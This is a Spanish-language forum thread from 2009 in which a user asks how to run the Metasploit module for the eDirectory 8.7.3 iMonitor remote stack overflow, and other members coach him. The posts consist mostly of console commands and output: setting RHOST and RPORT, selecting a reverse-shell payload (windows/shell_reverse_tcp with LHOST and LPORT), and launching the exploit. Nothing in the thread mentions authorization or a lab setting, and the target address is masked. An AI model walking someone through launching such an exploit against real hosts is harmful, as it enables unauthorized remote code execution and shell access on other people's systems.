buffer overflow imonitor

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

buffer overflow imonitor

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: buffer overflow imonitor (Leído 2,248 veces)

smag

Desconectado

Mensajes: 6

buffer overflow imonitor

« en: 5 Agosto 2009, 17:25 »

Hola a todos
Estoy tratando de lanzar un exploit con metasploit 3 para causar un buffer overflow en imonitor, el procedimiento que hago es el siguiente
msf > search imonitor

Searching loaded modules for pattern 'imonitor'...

Exploits
========

Name Description
---- -----------
windows/http/edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow

msf > use windows/http/edirectory_imonitor
msf exploit(edirectory_imonitor) > help

Exploit Commands
================

Command Description
------- -----------
check Check to see if a target is vulnerable
exploit Launch an exploit attempt
rcheck Reloads the module and checks if the target is vulnerable
rexploit Reloads the module and launches an exploit attempt

msf exploit(edirectory_imonitor) >exploit

[-] Exploit failed: A payload has not been selected.

Exploit completed, but no session was created.

Que es lo que me falta hacer porque los payload que me cargan no me dejan agregar opciones.
Gracias


	En línea

pedrox@

Desconectado

Mensajes: 48

Re: buffer overflow imonitor

« Respuesta #1 en: 5 Agosto 2009, 22:06 »

Lo que tendras que hacer es un: show options
para saber que datos necesita que introduzcas en el exploit (Por ejemplo IP del host y puerto).

Despues tendrás que asignar los valores de las opciones con el comando set.
Por ejemplo si RHOST sería la variable, para asignar valor tendrías que hacer:

set RHOST 192.168.1.2

Citar

[-] Exploit failed: A payload has not been selected.

También tendrás que seleccionar el PAYLOAD que será el modo/tipo de ataque que quieres que se realize al sistema atacado.

Para ver los PAYLOADS que tienes disponibles, utiliza el comando show payloads, después para asignar el payload, utiliza el comando set:

set PAYLOAD win32_reverse #por ejemplo

Cualquier duda, aquí estamos!

Un saludo.


	En línea

smag

Desconectado

Mensajes: 6

Re: buffer overflow imonitor

« Respuesta #2 en: 5 Agosto 2009, 22:20 »

Gracias por tu ayuda voy a probar ;-)


	En línea

smag

Desconectado

Mensajes: 6

Re: buffer overflow imonitor

« Respuesta #3 en: 5 Agosto 2009, 23:20 »

En primer lugar gracias por la ayuda, tengo un problemita que es el siguiente
msf exploit(edirectory_imonitor) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST xxx.xxx.xxx yes The target address
RPORT 8181 yes The target port
SSL false no Use SSL
VHOST no HTTP server virtual host

Payload options (windows/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST xxx.xxx.xxx yes The local address
LPORT 4444 yes The local port

Exploit target:

Id Name
-- ----
0 Windows (ALL) - eDirectory 8.7.3 iMonitor

msf exploit(edirectory_imonitor) >

Este EXITFUNC no se a que se refiere, trate de ponerle un valor con show option, no se si lo hice bien. Despues cuando ejecuto el exploit me da el siguiente mensaje

msf exploit(edirectory_imonitor) > exploit

Handler binding to LHOST 0.0.0.0
Started reverse handler

Exploit completed, but no session was created.

msf exploit(edirectory_imonitor) >

hice lo correcto o me falto algo?????


	En línea

Fire544

Desconectado

Mensajes: 14

"Escucha el sonido del 0, 1"

Re: buffer overflow imonitor

« Respuesta #4 en: 28 Agosto 2009, 22:37 »

Dejalo a sí no modifiques nada solo Rport e Rhost.


	En línea

"Sólo los pobres de conosimientos ven quien eres, sólo los ricos saven porque"

Páginas: [1]

Ir a: